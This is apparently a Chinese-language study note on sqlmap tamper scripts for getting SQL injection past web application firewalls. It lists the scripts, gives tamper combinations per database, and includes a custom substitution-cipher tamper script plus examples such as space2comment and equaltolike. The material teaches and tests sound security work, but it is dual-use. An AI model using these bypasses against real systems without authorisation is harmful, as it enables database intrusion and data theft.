sqlmap tamper脚本的学习。
SQLMAP tamper
SQLMAP在注入语句的时候,有时会遇到WAF或其他防御软件,导致不能成功注入出语句。在SQLMAP的tamper目录下面有一些绕过脚本,结合网上的一些资料学习整理以下。
关于绕过WAF,要模糊测试,找到它的特性,具体情况具体绕过。
tamper 简介
可以参考以下文章,看看整理分类。
在tamper目录下面就是其中的脚本,在脚本里面有相应的代码和解释。以下只是简单的列举出了前几个。
apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart
apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart
appendnullbyte.py Appends encoded NULL byte character at the end of payload
base64encode.py Base64 all characters in a given payload
between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
Replaces equals operator ('=') with 'BETWEEN # AND #'
bluecoat.py Replaces space character after SQL statement with a valid random blank character.
Afterwards replace character = with LIKE operator
针对不同的数据库,会有不同的脚本来进行绕过。
SQLMap Tamper Scripts (SQL Injection and WAF bypass)
General Tamper testing:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
MSSQL
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
MySQL
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
tamper 绕过案例
案例一 SQLMAP Tamper Scripts for The Win
上面链接的案例很好,该程序对输入的参数内容进行了加密,经过加密后到达服务器端进行解密,然后将数据发送给数据库。如何知道这个加密函数呢?通过一个个字符的替换,然后得到对应的加密内容。
Normal Letter = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
Encrypted Letters = 'QqnPvka03wMU6ZybjmK4BRSEWdVishgClpI1AouFNOJ9zrtL2Yef7Tc8GxDHX5'
编写对应的tamper
#!/usr/bin/env python
from lib.core.data import kb
from lib.core.enums import PRIORITY
import string
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
orig = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
srvr = "QqnPvka03wMU6ZybjmK4BRSEWdVishgClpI1AouFNOJ9zrtL2Yef7Tc8GxDHX5"
return payload.translate(string.maketrans(orig,srvr))
案例二 WooYun-2015-144854 space2comment.py
用sqlmap跑不出数据,经测试有过滤,将空格和一些关键词过滤了。
space2comment.py 使用注释来代替空格。
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
案例三 equaltolike.py
使用 like代替等号
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
https://wooyun.shuimugan.com/bug/view?bug_no=074790
